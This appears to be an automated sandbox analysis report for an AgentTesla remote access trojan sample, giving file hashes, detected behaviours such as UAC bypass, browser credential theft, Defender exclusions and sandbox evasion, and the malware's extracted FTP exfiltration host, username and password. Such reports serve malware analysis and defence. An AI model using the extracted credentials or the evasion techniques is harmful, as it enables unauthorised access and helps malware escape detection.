General

  • Target

    Payment.Gz.gz

  • Size

    605KB

  • Sample

    240917-mjt29sybmp

  • MD5

    4273fb6daefbb4d0770c059c363cc3d8

  • SHA1

    5d68193d6b37f7e203a301c201778427874f2659

  • SHA256

    f0ac2705080490731369ac9d44c707b2a48e4b799a48d06b6d3c904a463cdf50

  • SHA512

    1fd4ce1c31bbfe3e5b87ff96bf5537fbecdede29c91e3d0ae22aa7ab28561c78aa59ed5c06bf32ac033b90973ae2fa7716ffb5f21acf3a2c4f75415989ca26db

  • SSDEEP

    12288:8rhjwZ3XvmNQNqW4lX0p69v+fjsBCLoR4IvNAf2+gUDxr:8uWOiYJo683vyKUNr

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    u;4z3V.Iir1l

Targets

    • Target

      Paymet.exe

    • Size

      2.5MB

    • MD5

      2fd029782f709559adefb235eedbd093

    • SHA1

      677219bbd0ab70938a2a658b336418df69c9bb15

    • SHA256

      fe03eaf28bc8911f525983a47431e8e4d338a8abc7f2c7833596480ea5eddb02

    • SHA512

      c86032f2060a89e82ee32549612d5004d10d23010f3e7647821bac25a05340a381f7e0355be63d8ff7f8ccd4d26a2605dcda3e114bd3471e2497410f6b7e029d

    • SSDEEP

      12288:fHPEAmDrpKPtlUM7X1dsUxawC66IHn4Ks6axdNFAzE8l1+/bU5G7AOsS7o:fHPHDUujFC66ge5FMRl1dG7eS7o

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

    • UAC bypass

    • Windows security bypass

    • Credentials from Password Stores: Credentials from Web Browsers

      Malicious Access or copy of Web Browser Credential store.

    • Looks for VirtualBox Guest Additions in registry

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Looks for VMWare Tools registry key

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Windows security modification

    • Checks whether UAC is enabled

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks